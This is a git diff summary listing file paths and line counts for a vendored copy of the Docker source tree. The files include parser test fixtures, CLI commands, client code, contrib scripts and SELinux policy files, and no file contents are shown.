.../testfiles/brimstone-consuldock/Dockerfile | 26 + .../testfiles/brimstone-consuldock/result | 5 + .../brimstone-docker-consul/Dockerfile | 52 + .../testfiles/brimstone-docker-consul/result | 9 + .../testfiles/continueIndent/Dockerfile | 36 + .../parser/testfiles/continueIndent/result | 10 + .../testfiles/cpuguy83-nagios/Dockerfile | 54 + .../parser/testfiles/cpuguy83-nagios/result | 40 + .../parser/testfiles/docker/Dockerfile | 103 + .../dockerfile/parser/testfiles/docker/result | 24 + .../parser/testfiles/env/Dockerfile 
| 23 + .../dockerfile/parser/testfiles/env/result | 16 + .../testfiles/escape-after-comment/Dockerfile | 9 + .../testfiles/escape-after-comment/result | 3 + .../testfiles/escape-nonewline/Dockerfile | 7 + .../parser/testfiles/escape-nonewline/result | 3 + .../parser/testfiles/escape/Dockerfile | 6 + .../dockerfile/parser/testfiles/escape/result | 3 + .../parser/testfiles/escapes/Dockerfile | 14 + .../parser/testfiles/escapes/result | 6 + .../parser/testfiles/flags/Dockerfile | 10 + .../dockerfile/parser/testfiles/flags/result | 10 + .../parser/testfiles/health/Dockerfile | 10 + .../dockerfile/parser/testfiles/health/result | 9 + .../parser/testfiles/influxdb/Dockerfile | 15 + .../parser/testfiles/influxdb/result | 11 + .../Dockerfile | 1 + .../result | 1 + .../Dockerfile | 1 + .../result | 1 + .../Dockerfile | 1 + .../jeztah-invalid-json-single-quotes/result | 1 + .../Dockerfile | 1 + .../result | 1 + .../Dockerfile | 1 + .../result | 1 + .../parser/testfiles/json/Dockerfile | 8 + .../dockerfile/parser/testfiles/json/result | 8 + .../kartar-entrypoint-oddities/Dockerfile | 7 + .../kartar-entrypoint-oddities/result | 7 + .../lk4d4-the-edge-case-generator/Dockerfile | 48 + .../lk4d4-the-edge-case-generator/result | 29 + .../parser/testfiles/mail/Dockerfile | 16 + .../dockerfile/parser/testfiles/mail/result | 14 + .../testfiles/multiple-volumes/Dockerfile | 3 + .../parser/testfiles/multiple-volumes/result | 2 + .../parser/testfiles/mumble/Dockerfile | 7 + .../dockerfile/parser/testfiles/mumble/result | 4 + .../parser/testfiles/nginx/Dockerfile | 14 + .../dockerfile/parser/testfiles/nginx/result | 11 + .../parser/testfiles/tf2/Dockerfile | 23 + .../dockerfile/parser/testfiles/tf2/result | 20 + .../parser/testfiles/weechat/Dockerfile | 9 + .../parser/testfiles/weechat/result | 6 + .../parser/testfiles/znc/Dockerfile | 7 + .../dockerfile/parser/testfiles/znc/result | 5 + .../docker/builder/dockerfile/parser/utils.go | 176 + .../docker/builder/dockerfile/shell_parser.go | 
329 + .../builder/dockerfile/shell_parser_test.go | 155 + .../docker/builder/dockerfile/support.go | 19 + .../docker/builder/dockerfile/support_test.go | 65 + .../docker/builder/dockerfile/utils_test.go | 50 + .../docker/builder/dockerfile/wordsTest | 25 + .../docker/docker/builder/dockerignore.go | 48 + .../builder/dockerignore/dockerignore.go | 49 + .../builder/dockerignore/dockerignore_test.go | 57 + .../docker/builder/dockerignore_test.go | 95 + .../github.com/docker/docker/builder/git.go | 28 + .../docker/docker/builder/remote.go | 157 + .../docker/docker/builder/remote_test.go | 213 + .../docker/docker/builder/tarsum.go | 158 + .../docker/docker/builder/tarsum_test.go | 265 + .../docker/docker/builder/utils_test.go | 87 + vendor/github.com/docker/docker/cli/cobra.go | 139 + .../cli/command/bundlefile/bundlefile.go | 69 + .../cli/command/bundlefile/bundlefile_test.go | 77 + .../docker/cli/command/checkpoint/cmd.go | 24 + .../docker/cli/command/checkpoint/create.go | 58 + .../docker/cli/command/checkpoint/list.go | 62 + .../docker/cli/command/checkpoint/remove.go | 44 + .../docker/docker/cli/command/cli.go | 260 + .../docker/cli/command/commands/commands.go | 91 + .../docker/cli/command/container/attach.go | 130 + .../docker/cli/command/container/cmd.go | 46 + .../docker/cli/command/container/commit.go | 76 + .../docker/docker/cli/command/container/cp.go | 303 + .../docker/cli/command/container/create.go | 218 + .../docker/cli/command/container/diff.go | 58 + .../docker/cli/command/container/exec.go | 207 + .../docker/cli/command/container/exec_test.go | 116 + .../docker/cli/command/container/export.go | 59 + .../docker/cli/command/container/hijack.go | 116 + .../docker/cli/command/container/inspect.go | 47 + .../docker/cli/command/container/kill.go | 56 + .../docker/cli/command/container/list.go | 141 + .../docker/cli/command/container/logs.go | 87 + .../docker/cli/command/container/pause.go | 49 + .../docker/cli/command/container/port.go | 78 + 
.../docker/cli/command/container/prune.go | 75 + .../docker/cli/command/container/ps_test.go | 118 + .../docker/cli/command/container/rename.go | 51 + .../docker/cli/command/container/restart.go | 62 + .../docker/docker/cli/command/container/rm.go | 73 + .../docker/cli/command/container/run.go | 285 + .../docker/cli/command/container/start.go | 179 + .../docker/cli/command/container/stats.go | 243 + .../cli/command/container/stats_helpers.go | 226 + .../cli/command/container/stats_unit_test.go | 20 + .../docker/cli/command/container/stop.go | 67 + .../docker/cli/command/container/top.go | 58 + .../docker/cli/command/container/tty.go | 103 + .../docker/cli/command/container/unpause.go | 50 + .../docker/cli/command/container/update.go | 163 + .../docker/cli/command/container/utils.go | 143 + .../docker/cli/command/container/wait.go | 50 + .../docker/docker/cli/command/events_utils.go | 49 + .../docker/cli/command/formatter/container.go | 235 + .../cli/command/formatter/container_test.go | 398 + .../docker/cli/command/formatter/custom.go | 51 + .../cli/command/formatter/custom_test.go | 28 + .../cli/command/formatter/disk_usage.go | 334 + .../docker/cli/command/formatter/formatter.go | 123 + .../docker/cli/command/formatter/image.go | 259 + .../cli/command/formatter/image_test.go | 333 + .../docker/cli/command/formatter/network.go | 117 + .../cli/command/formatter/network_test.go | 208 + .../docker/cli/command/formatter/reflect.go | 65 + .../cli/command/formatter/reflect_test.go | 66 + .../docker/cli/command/formatter/service.go | 322 + .../docker/cli/command/formatter/stats.go | 211 + .../cli/command/formatter/stats_test.go | 228 + .../docker/cli/command/formatter/volume.go | 121 + .../cli/command/formatter/volume_test.go | 189 + .../cli/command/idresolver/idresolver.go | 90 + .../docker/docker/cli/command/image/build.go | 477 + .../docker/docker/cli/command/image/cmd.go | 33 + .../docker/cli/command/image/history.go | 99 + 
.../docker/docker/cli/command/image/import.go | 88 + .../docker/cli/command/image/inspect.go | 44 + .../docker/docker/cli/command/image/list.go | 96 + .../docker/docker/cli/command/image/load.go | 77 + .../docker/docker/cli/command/image/prune.go | 92 + .../docker/docker/cli/command/image/pull.go | 84 + .../docker/docker/cli/command/image/push.go | 61 + .../docker/docker/cli/command/image/remove.go | 77 + .../docker/docker/cli/command/image/save.go | 57 + .../docker/docker/cli/command/image/tag.go | 41 + .../docker/docker/cli/command/image/trust.go | 381 + .../docker/cli/command/image/trust_test.go | 57 + .../docker/docker/cli/command/in.go | 75 + .../docker/cli/command/inspect/inspector.go | 195 + .../cli/command/inspect/inspector_test.go | 221 + .../docker/docker/cli/command/network/cmd.go | 28 + .../docker/cli/command/network/connect.go | 64 + .../docker/cli/command/network/create.go | 226 + .../docker/cli/command/network/disconnect.go | 41 + .../docker/cli/command/network/inspect.go | 45 + .../docker/docker/cli/command/network/list.go | 76 + .../docker/cli/command/network/prune.go | 73 + .../docker/cli/command/network/remove.go | 43 + .../docker/docker/cli/command/node/cmd.go | 43 + .../docker/docker/cli/command/node/demote.go | 36 + .../docker/docker/cli/command/node/inspect.go | 144 + .../docker/docker/cli/command/node/list.go | 115 + .../docker/docker/cli/command/node/opts.go | 60 + .../docker/docker/cli/command/node/promote.go | 36 + .../docker/docker/cli/command/node/ps.go | 93 + .../docker/docker/cli/command/node/remove.go | 56 + .../docker/docker/cli/command/node/update.go | 121 + .../docker/docker/cli/command/out.go | 69 + .../docker/docker/cli/command/plugin/cmd.go | 31 + .../docker/cli/command/plugin/create.go | 125 + .../docker/cli/command/plugin/disable.go | 36 + .../docker/cli/command/plugin/enable.go | 47 + .../docker/cli/command/plugin/inspect.go | 42 + .../docker/cli/command/plugin/install.go | 208 + .../docker/docker/cli/command/plugin/list.go 
| 63 + .../docker/docker/cli/command/plugin/push.go | 71 + .../docker/cli/command/plugin/remove.go | 55 + .../docker/docker/cli/command/plugin/set.go | 22 + .../docker/cli/command/plugin/upgrade.go | 100 + .../docker/docker/cli/command/prune/prune.go | 50 + .../docker/docker/cli/command/registry.go | 186 + .../docker/cli/command/registry/login.go | 85 + .../docker/cli/command/registry/logout.go | 77 + .../docker/cli/command/registry/search.go | 126 + .../docker/docker/cli/command/secret/cmd.go | 25 + .../docker/cli/command/secret/create.go | 79 + .../docker/cli/command/secret/inspect.go | 45 + .../docker/docker/cli/command/secret/ls.go | 68 + .../docker/cli/command/secret/remove.go | 57 + .../docker/docker/cli/command/secret/utils.go | 76 + .../docker/docker/cli/command/service/cmd.go | 29 + .../docker/cli/command/service/create.go | 100 + .../docker/cli/command/service/inspect.go | 84 + .../cli/command/service/inspect_test.go | 129 + .../docker/docker/cli/command/service/list.go | 158 + .../docker/docker/cli/command/service/logs.go | 163 + .../docker/docker/cli/command/service/opts.go | 648 ++ .../docker/cli/command/service/opts_test.go | 107 + .../docker/cli/command/service/parse.go | 68 + .../docker/docker/cli/command/service/ps.go | 76 + .../docker/cli/command/service/remove.go | 47 + .../docker/cli/command/service/scale.go | 96 + .../docker/cli/command/service/trust.go | 96 + .../docker/cli/command/service/update.go | 849 ++ .../docker/cli/command/service/update_test.go | 384 + .../docker/docker/cli/command/stack/cmd.go | 35 + .../docker/docker/cli/command/stack/common.go | 60 + .../docker/docker/cli/command/stack/deploy.go | 357 + .../cli/command/stack/deploy_bundlefile.go | 83 + .../docker/docker/cli/command/stack/list.go | 113 + .../docker/docker/cli/command/stack/opts.go | 49 + .../docker/docker/cli/command/stack/ps.go | 61 + .../docker/docker/cli/command/stack/remove.go | 112 + .../docker/cli/command/stack/services.go | 79 + 
.../docker/docker/cli/command/swarm/cmd.go | 28 + .../docker/docker/cli/command/swarm/init.go | 85 + .../docker/docker/cli/command/swarm/join.go | 69 + .../docker/cli/command/swarm/join_token.go | 105 + .../docker/docker/cli/command/swarm/leave.go | 44 + .../docker/docker/cli/command/swarm/opts.go | 209 + .../docker/cli/command/swarm/opts_test.go | 37 + .../docker/docker/cli/command/swarm/unlock.go | 54 + .../docker/cli/command/swarm/unlock_key.go | 79 + .../docker/docker/cli/command/swarm/update.go | 72 + .../docker/docker/cli/command/system/cmd.go | 26 + .../docker/docker/cli/command/system/df.go | 56 + .../docker/cli/command/system/events.go | 140 + .../docker/docker/cli/command/system/info.go | 334 + .../docker/cli/command/system/inspect.go | 203 + .../docker/docker/cli/command/system/prune.go | 93 + .../docker/cli/command/system/version.go | 113 + .../docker/docker/cli/command/task/print.go | 161 + .../docker/docker/cli/command/trust.go | 39 + .../docker/docker/cli/command/utils.go | 87 + .../docker/docker/cli/command/volume/cmd.go | 45 + .../docker/cli/command/volume/create.go | 111 + .../docker/cli/command/volume/inspect.go | 55 + .../docker/docker/cli/command/volume/list.go | 91 + .../docker/docker/cli/command/volume/prune.go | 75 + .../docker/cli/command/volume/remove.go | 68 + .../docker/cli/compose/convert/compose.go | 116 + .../cli/compose/convert/compose_test.go | 122 + .../docker/cli/compose/convert/service.go | 416 + .../cli/compose/convert/service_test.go | 216 + .../docker/cli/compose/convert/volume.go | 128 + .../docker/cli/compose/convert/volume_test.go | 133 + .../compose/interpolation/interpolation.go | 90 + .../interpolation/interpolation_test.go | 59 + .../docker/cli/compose/loader/example1.env | 8 + .../docker/cli/compose/loader/example2.env | 1 + .../cli/compose/loader/full-example.yml | 287 + .../docker/cli/compose/loader/loader.go | 653 ++ .../docker/cli/compose/loader/loader_test.go | 800 ++ .../docker/cli/compose/schema/bindata.go | 260 
+ .../schema/data/config_schema_v3.0.json | 383 + .../schema/data/config_schema_v3.1.json | 428 + .../docker/cli/compose/schema/schema.go | 137 + .../docker/cli/compose/schema/schema_test.go | 52 + .../docker/cli/compose/template/template.go | 100 + .../cli/compose/template/template_test.go | 83 + .../docker/docker/cli/compose/types/types.go | 253 + vendor/github.com/docker/docker/cli/error.go | 33 + .../docker/docker/cli/flags/client.go | 13 + .../docker/docker/cli/flags/common.go | 120 + .../docker/docker/cli/flags/common_test.go | 42 + .../github.com/docker/docker/cli/required.go | 96 + .../docker/docker/cli/trust/trust.go | 232 + .../docker/docker/cliconfig/config.go | 120 + .../docker/docker/cliconfig/config_test.go | 621 ++ .../docker/cliconfig/configfile/file.go | 183 + .../docker/cliconfig/configfile/file_test.go | 27 + .../cliconfig/credentials/credentials.go | 17 + .../cliconfig/credentials/default_store.go | 22 + .../credentials/default_store_darwin.go | 3 + .../credentials/default_store_linux.go | 3 + .../credentials/default_store_unsupported.go | 5 + .../credentials/default_store_windows.go | 3 + .../cliconfig/credentials/file_store.go | 53 + .../cliconfig/credentials/file_store_test.go | 139 + .../cliconfig/credentials/native_store.go | 144 + .../credentials/native_store_test.go | 355 + .../github.com/docker/docker/client/README.md | 35 + .../docker/docker/client/checkpoint_create.go | 13 + .../docker/client/checkpoint_create_test.go | 73 + .../docker/docker/client/checkpoint_delete.go | 20 + .../docker/client/checkpoint_delete_test.go | 54 + .../docker/docker/client/checkpoint_list.go | 28 + .../docker/client/checkpoint_list_test.go | 57 + .../github.com/docker/docker/client/client.go | 246 + .../docker/docker/client/client_mock_test.go | 45 + .../docker/docker/client/client_test.go | 283 + .../docker/docker/client/client_unix.go | 6 + .../docker/docker/client/client_windows.go | 4 + .../docker/docker/client/container_attach.go | 37 + 
.../docker/docker/client/container_commit.go | 53 + .../docker/client/container_commit_test.go | 96 + .../docker/docker/client/container_copy.go | 97 + .../docker/client/container_copy_test.go | 244 + .../docker/docker/client/container_create.go | 50 + .../docker/client/container_create_test.go | 76 + .../docker/docker/client/container_diff.go | 23 + .../docker/client/container_diff_test.go | 61 + .../docker/docker/client/container_exec.go | 54 + .../docker/client/container_exec_test.go | 157 + .../docker/docker/client/container_export.go | 20 + .../docker/client/container_export_test.go | 50 + .../docker/docker/client/container_inspect.go | 54 + .../docker/client/container_inspect_test.go | 125 + .../docker/docker/client/container_kill.go | 17 + .../docker/client/container_kill_test.go | 46 + .../docker/docker/client/container_list.go | 56 + .../docker/client/container_list_test.go | 96 + .../docker/docker/client/container_logs.go | 52 + .../docker/client/container_logs_test.go | 133 + .../docker/docker/client/container_pause.go | 10 + .../docker/client/container_pause_test.go | 41 + .../docker/docker/client/container_prune.go | 36 + .../docker/docker/client/container_remove.go | 27 + .../docker/client/container_remove_test.go | 59 + .../docker/docker/client/container_rename.go | 16 + .../docker/client/container_rename_test.go | 46 + .../docker/docker/client/container_resize.go | 29 + .../docker/client/container_resize_test.go | 82 + .../docker/docker/client/container_restart.go | 22 + .../docker/client/container_restart_test.go | 48 + .../docker/docker/client/container_start.go | 24 + .../docker/client/container_start_test.go | 58 + .../docker/docker/client/container_stats.go | 26 + .../docker/client/container_stats_test.go | 70 + .../docker/docker/client/container_stop.go | 21 + .../docker/client/container_stop_test.go | 48 + .../docker/docker/client/container_top.go | 28 + .../docker/client/container_top_test.go | 74 + 
.../docker/docker/client/container_unpause.go | 10 + .../docker/client/container_unpause_test.go | 41 + .../docker/docker/client/container_update.go | 22 + .../docker/client/container_update_test.go | 58 + .../docker/docker/client/container_wait.go | 26 + .../docker/client/container_wait_test.go | 70 + .../docker/docker/client/disk_usage.go | 26 + .../github.com/docker/docker/client/errors.go | 278 + .../github.com/docker/docker/client/events.go | 102 + .../docker/docker/client/events_test.go | 165 + .../github.com/docker/docker/client/hijack.go | 177 + .../docker/docker/client/image_build.go | 123 + .../docker/docker/client/image_build_test.go | 233 + .../docker/docker/client/image_create.go | 34 + .../docker/docker/client/image_create_test.go | 76 + .../docker/docker/client/image_history.go | 22 + .../docker/client/image_history_test.go | 60 + .../docker/docker/client/image_import.go | 37 + .../docker/docker/client/image_import_test.go | 81 + .../docker/docker/client/image_inspect.go | 33 + .../docker/client/image_inspect_test.go | 71 + .../docker/docker/client/image_list.go | 45 + .../docker/docker/client/image_list_test.go | 159 + .../docker/docker/client/image_load.go | 30 + .../docker/docker/client/image_load_test.go | 95 + .../docker/docker/client/image_prune.go | 36 + .../docker/docker/client/image_pull.go | 46 + .../docker/docker/client/image_pull_test.go | 199 + .../docker/docker/client/image_push.go | 54 + .../docker/docker/client/image_push_test.go | 180 + .../docker/docker/client/image_remove.go | 31 + .../docker/docker/client/image_remove_test.go | 95 + .../docker/docker/client/image_save.go | 22 + .../docker/docker/client/image_save_test.go | 58 + .../docker/docker/client/image_search.go | 51 + .../docker/docker/client/image_search_test.go | 165 + .../docker/docker/client/image_tag.go | 34 + .../docker/docker/client/image_tag_test.go | 121 + .../github.com/docker/docker/client/info.go | 26 + .../docker/docker/client/info_test.go | 76 + 
.../docker/docker/client/interface.go | 171 + .../docker/client/interface_experimental.go | 17 + .../docker/docker/client/interface_stable.go | 10 + .../github.com/docker/docker/client/login.go | 29 + .../docker/docker/client/network_connect.go | 18 + .../docker/client/network_connect_test.go | 107 + .../docker/docker/client/network_create.go | 25 + .../docker/client/network_create_test.go | 72 + .../docker/client/network_disconnect.go | 14 + .../docker/client/network_disconnect_test.go | 64 + .../docker/docker/client/network_inspect.go | 38 + .../docker/client/network_inspect_test.go | 69 + .../docker/docker/client/network_list.go | 31 + .../docker/docker/client/network_list_test.go | 108 + .../docker/docker/client/network_prune.go | 36 + .../docker/docker/client/network_remove.go | 10 + .../docker/client/network_remove_test.go | 47 + .../docker/docker/client/node_inspect.go | 33 + .../docker/docker/client/node_inspect_test.go | 65 + .../docker/docker/client/node_list.go | 36 + .../docker/docker/client/node_list_test.go | 94 + .../docker/docker/client/node_remove.go | 21 + .../docker/docker/client/node_remove_test.go | 69 + .../docker/docker/client/node_update.go | 18 + .../docker/docker/client/node_update_test.go | 49 + .../github.com/docker/docker/client/ping.go | 30 + .../docker/docker/client/plugin_create.go | 26 + .../docker/docker/client/plugin_disable.go | 19 + .../docker/client/plugin_disable_test.go | 48 + .../docker/docker/client/plugin_enable.go | 19 + .../docker/client/plugin_enable_test.go | 48 + .../docker/docker/client/plugin_inspect.go | 32 + .../docker/client/plugin_inspect_test.go | 54 + .../docker/docker/client/plugin_install.go | 113 + .../docker/docker/client/plugin_list.go | 21 + .../docker/docker/client/plugin_list_test.go | 59 + .../docker/docker/client/plugin_push.go | 17 + .../docker/docker/client/plugin_push_test.go | 51 + .../docker/docker/client/plugin_remove.go | 20 + .../docker/client/plugin_remove_test.go | 49 + 
.../docker/docker/client/plugin_set.go | 12 + .../docker/docker/client/plugin_set_test.go | 47 + .../docker/docker/client/plugin_upgrade.go | 37 + .../docker/docker/client/request.go | 247 + .../docker/docker/client/request_test.go | 92 + .../docker/docker/client/secret_create.go | 24 + .../docker/client/secret_create_test.go | 57 + .../docker/docker/client/secret_inspect.go | 34 + .../docker/client/secret_inspect_test.go | 65 + .../docker/docker/client/secret_list.go | 35 + .../docker/docker/client/secret_list_test.go | 94 + .../docker/docker/client/secret_remove.go | 10 + .../docker/client/secret_remove_test.go | 47 + .../docker/docker/client/secret_update.go | 19 + .../docker/client/secret_update_test.go | 49 + .../docker/docker/client/service_create.go | 30 + .../docker/client/service_create_test.go | 57 + .../docker/docker/client/service_inspect.go | 33 + .../docker/client/service_inspect_test.go | 65 + .../docker/docker/client/service_list.go | 35 + .../docker/docker/client/service_list_test.go | 94 + .../docker/docker/client/service_logs.go | 52 + .../docker/docker/client/service_logs_test.go | 133 + .../docker/docker/client/service_remove.go | 10 + .../docker/client/service_remove_test.go | 47 + .../docker/docker/client/service_update.go | 41 + .../docker/client/service_update_test.go | 77 + .../docker/client/swarm_get_unlock_key.go | 21 + .../docker/docker/client/swarm_init.go | 21 + .../docker/docker/client/swarm_init_test.go | 54 + .../docker/docker/client/swarm_inspect.go | 21 + .../docker/client/swarm_inspect_test.go | 56 + .../docker/docker/client/swarm_join.go | 13 + .../docker/docker/client/swarm_join_test.go | 51 + .../docker/docker/client/swarm_leave.go | 18 + .../docker/docker/client/swarm_leave_test.go | 66 + .../docker/docker/client/swarm_unlock.go | 17 + .../docker/docker/client/swarm_update.go | 22 + .../docker/docker/client/swarm_update_test.go | 49 + .../docker/docker/client/task_inspect.go | 34 + 
.../docker/docker/client/task_inspect_test.go | 54 + .../docker/docker/client/task_list.go | 35 + .../docker/docker/client/task_list_test.go | 94 + .../docker/docker/client/testdata/ca.pem | 18 + .../docker/docker/client/testdata/cert.pem | 18 + .../docker/docker/client/testdata/key.pem | 27 + .../docker/docker/client/transport.go | 28 + .../github.com/docker/docker/client/utils.go | 33 + .../docker/docker/client/version.go | 21 + .../docker/docker/client/volume_create.go | 21 + .../docker/client/volume_create_test.go | 75 + .../docker/docker/client/volume_inspect.go | 38 + .../docker/client/volume_inspect_test.go | 76 + .../docker/docker/client/volume_list.go | 32 + .../docker/docker/client/volume_list_test.go | 98 + .../docker/docker/client/volume_prune.go | 36 + .../docker/docker/client/volume_remove.go | 21 + .../docker/client/volume_remove_test.go | 47 + .../docker/docker/cmd/docker/daemon_none.go | 27 + .../docker/cmd/docker/daemon_none_test.go | 17 + .../docker/cmd/docker/daemon_unit_test.go | 30 + .../docker/docker/cmd/docker/daemon_unix.go | 79 + .../docker/docker/cmd/docker/docker.go | 180 + .../docker/docker/cmd/docker/docker_test.go | 32 + .../docker/cmd/docker/docker_windows.go | 18 + .../docker/docker/cmd/dockerd/README.md | 3 + .../docker/docker/cmd/dockerd/daemon.go | 524 ++ .../docker/cmd/dockerd/daemon_freebsd.go | 5 + .../docker/docker/cmd/dockerd/daemon_linux.go | 11 + .../docker/cmd/dockerd/daemon_solaris.go | 85 + .../docker/docker/cmd/dockerd/daemon_test.go | 145 + .../docker/docker/cmd/dockerd/daemon_unix.go | 137 + .../docker/cmd/dockerd/daemon_unix_test.go | 114 + .../docker/cmd/dockerd/daemon_windows.go | 92 + .../docker/docker/cmd/dockerd/docker.go | 110 + .../docker/cmd/dockerd/docker_windows.go | 18 + .../dockerd/hack/malformed_host_override.go | 121 + .../hack/malformed_host_override_test.go | 124 + .../docker/docker/cmd/dockerd/metrics.go | 27 + .../docker/cmd/dockerd/service_unsupported.go | 14 + 
.../docker/cmd/dockerd/service_windows.go | 426 + .../docker/docker/container/archive.go | 76 + .../docker/docker/container/container.go | 1103 +++ .../docker/container/container_linux.go | 9 + .../docker/container/container_notlinux.go | 23 + .../docker/container/container_unit_test.go | 60 + .../docker/docker/container/container_unix.go | 448 + .../docker/container/container_windows.go | 111 + .../docker/docker/container/health.go | 49 + .../docker/docker/container/history.go | 30 + .../docker/docker/container/memory_store.go | 95 + .../docker/container/memory_store_test.go | 106 + .../docker/docker/container/monitor.go | 46 + .../docker/docker/container/mounts_unix.go | 12 + .../docker/docker/container/mounts_windows.go | 8 + .../docker/docker/container/state.go | 343 + .../docker/docker/container/state_solaris.go | 7 + .../docker/docker/container/state_test.go | 113 + .../docker/docker/container/state_unix.go | 10 + .../docker/docker/container/state_windows.go | 7 + .../docker/docker/container/store.go | 28 + .../docker/docker/container/stream/streams.go | 143 + .../docker/docker/contrib/README.md | 4 + .../docker/docker/contrib/REVIEWERS | 1 + .../docker/docker/contrib/apparmor/main.go | 56 + .../docker/contrib/apparmor/template.go | 268 + .../contrib/builder/deb/aarch64/build.sh | 10 + .../contrib/builder/deb/aarch64/generate.sh | 118 + .../deb/aarch64/ubuntu-trusty/Dockerfile | 24 + .../deb/aarch64/ubuntu-xenial/Dockerfile | 22 + .../contrib/builder/deb/amd64/README.md | 5 + .../docker/contrib/builder/deb/amd64/build.sh | 10 + .../deb/amd64/debian-jessie/Dockerfile | 20 + .../deb/amd64/debian-stretch/Dockerfile | 20 + .../deb/amd64/debian-wheezy/Dockerfile | 22 + .../contrib/builder/deb/amd64/generate.sh | 149 + .../deb/amd64/ubuntu-precise/Dockerfile | 16 + .../deb/amd64/ubuntu-trusty/Dockerfile | 16 + .../deb/amd64/ubuntu-xenial/Dockerfile | 16 + .../deb/amd64/ubuntu-yakkety/Dockerfile | 16 + .../deb/armhf/debian-jessie/Dockerfile | 20 + 
.../contrib/builder/deb/armhf/generate.sh | 158 + .../deb/armhf/raspbian-jessie/Dockerfile | 22 + .../deb/armhf/ubuntu-trusty/Dockerfile | 16 + .../deb/armhf/ubuntu-xenial/Dockerfile | 16 + .../deb/armhf/ubuntu-yakkety/Dockerfile | 16 + .../contrib/builder/deb/ppc64le/build.sh | 10 + .../contrib/builder/deb/ppc64le/generate.sh | 103 + .../deb/ppc64le/ubuntu-trusty/Dockerfile | 16 + .../deb/ppc64le/ubuntu-xenial/Dockerfile | 16 + .../deb/ppc64le/ubuntu-yakkety/Dockerfile | 16 + .../docker/contrib/builder/deb/s390x/build.sh | 10 + .../contrib/builder/deb/s390x/generate.sh | 96 + .../deb/s390x/ubuntu-xenial/Dockerfile | 16 + .../contrib/builder/rpm/amd64/README.md | 5 + .../docker/contrib/builder/rpm/amd64/build.sh | 10 + .../builder/rpm/amd64/centos-7/Dockerfile | 19 + .../builder/rpm/amd64/fedora-24/Dockerfile | 19 + .../builder/rpm/amd64/fedora-25/Dockerfile | 19 + .../contrib/builder/rpm/amd64/generate.sh | 189 + .../rpm/amd64/opensuse-13.2/Dockerfile | 18 + .../rpm/amd64/oraclelinux-6/Dockerfile | 28 + .../rpm/amd64/oraclelinux-7/Dockerfile | 18 + .../builder/rpm/amd64/photon-1.0/Dockerfile | 18 + .../docker/docker/contrib/check-config.sh | 354 + .../docker/contrib/completion/REVIEWERS | 2 + .../docker/contrib/completion/bash/docker | 4282 +++++++++ .../contrib/completion/fish/docker.fish | 405 + .../contrib/completion/powershell/readme.txt | 1 + .../docker/contrib/completion/zsh/REVIEWERS | 2 + .../docker/contrib/completion/zsh/_docker | 2787 ++++++ .../contrib/desktop-integration/README.md | 11 + .../desktop-integration/chromium/Dockerfile | 36 + .../desktop-integration/gparted/Dockerfile | 31 + .../contrib/docker-device-tool/README.md | 14 + .../contrib/docker-device-tool/device_tool.go | 176 + .../docker-device-tool/device_tool_windows.go | 4 + .../docker/docker/contrib/dockerize-disk.sh | 118 + .../contrib/download-frozen-image-v1.sh | 108 + .../contrib/download-frozen-image-v2.sh | 121 + .../docker/docker/contrib/editorconfig | 13 + 
.../docker/docker/contrib/gitdm/aliases | 148 + .../docker/docker/contrib/gitdm/domain-map | 39 + .../docker/contrib/gitdm/generate_aliases.sh | 16 + .../docker/docker/contrib/gitdm/gitdm.config | 17 + .../docker/contrib/httpserver/Dockerfile | 4 + .../contrib/httpserver/Dockerfile.solaris | 4 + .../docker/contrib/httpserver/server.go | 12 + .../docker/contrib/init/openrc/docker.confd | 13 + .../docker/contrib/init/openrc/docker.initd | 22 + .../docker/contrib/init/systemd/REVIEWERS | 3 + .../contrib/init/systemd/docker.service | 29 + .../contrib/init/systemd/docker.service.rpm | 28 + .../docker/contrib/init/systemd/docker.socket | 12 + .../contrib/init/sysvinit-debian/docker | 152 + .../init/sysvinit-debian/docker.default | 20 + .../contrib/init/sysvinit-redhat/docker | 153 + .../init/sysvinit-redhat/docker.sysconfig | 7 + .../docker/contrib/init/upstart/REVIEWERS | 2 + .../docker/contrib/init/upstart/docker.conf | 72 + .../docker/contrib/mac-install-bundle.sh | 45 + .../docker/docker/contrib/mkimage-alpine.sh | 87 + .../docker/contrib/mkimage-arch-pacman.conf | 92 + .../docker/docker/contrib/mkimage-arch.sh | 126 + .../contrib/mkimage-archarm-pacman.conf | 98 + .../docker/docker/contrib/mkimage-busybox.sh | 43 + .../docker/docker/contrib/mkimage-crux.sh | 75 + .../docker/contrib/mkimage-debootstrap.sh | 297 + .../docker/docker/contrib/mkimage-pld.sh | 73 + .../docker/docker/contrib/mkimage-rinse.sh | 123 + .../docker/docker/contrib/mkimage-yum.sh | 136 + .../docker/docker/contrib/mkimage.sh | 128 + .../contrib/mkimage/.febootstrap-minimize | 28 + .../docker/contrib/mkimage/busybox-static | 34 + .../docker/docker/contrib/mkimage/debootstrap | 226 + .../docker/contrib/mkimage/mageia-urpmi | 61 + .../docker/docker/contrib/mkimage/rinse | 25 + .../docker/docker/contrib/mkimage/solaris | 89 + .../docker/docker/contrib/nnp-test/Dockerfile | 9 + .../docker/docker/contrib/nnp-test/nnp-test.c | 10 + .../docker/contrib/nuke-graph-directory.sh | 64 + 
.../docker/docker/contrib/project-stats.sh | 22 + .../docker/docker/contrib/report-issue.sh | 105 + .../docker/docker/contrib/reprepro/suites.sh | 12 + .../docker-engine-selinux/LICENSE | 339 + .../docker-engine-selinux/Makefile | 23 + .../docker-engine-selinux/README.md | 1 + .../docker-engine-selinux/docker.fc | 29 + .../docker-engine-selinux/docker.if | 523 ++ .../docker-engine-selinux/docker.te | 399 + .../docker-engine-selinux/LICENSE | 339 + .../docker-engine-selinux/Makefile | 23 + .../docker-engine-selinux/README.md | 1 + .../docker-engine-selinux/docker.fc | 33 + .../docker-engine-selinux/docker.if | 659 ++ .../docker-engine-selinux/docker.te | 465 + .../selinux/docker-engine-selinux/LICENSE | 340 + .../selinux/docker-engine-selinux/Makefile | 16 + .../selinux/docker-engine-selinux/docker.fc | 18 + .../selinux/docker-engine-selinux/docker.if | 461 + .../selinux/docker-engine-selinux/docker.te | 407 + .../docker-engine-selinux/docker_selinux.8.gz | Bin 0 -> 2847 bytes .../contrib/syntax/nano/Dockerfile.nanorc | 26 + .../docker/contrib/syntax/nano/README.md | 32 + .../Preferences/Dockerfile.tmPreferences | 24 + .../Syntaxes/Dockerfile.tmLanguage | 143 + .../textmate/Docker.tmbundle/info.plist | 16 + .../docker/contrib/syntax/textmate/README.md | 17 + .../docker/contrib/syntax/textmate/REVIEWERS | 1 + .../docker/docker/contrib/syntax/vim/LICENSE | 22 + .../docker/contrib/syntax/vim/README.md | 26 + .../contrib/syntax/vim/doc/dockerfile.txt | 18 + 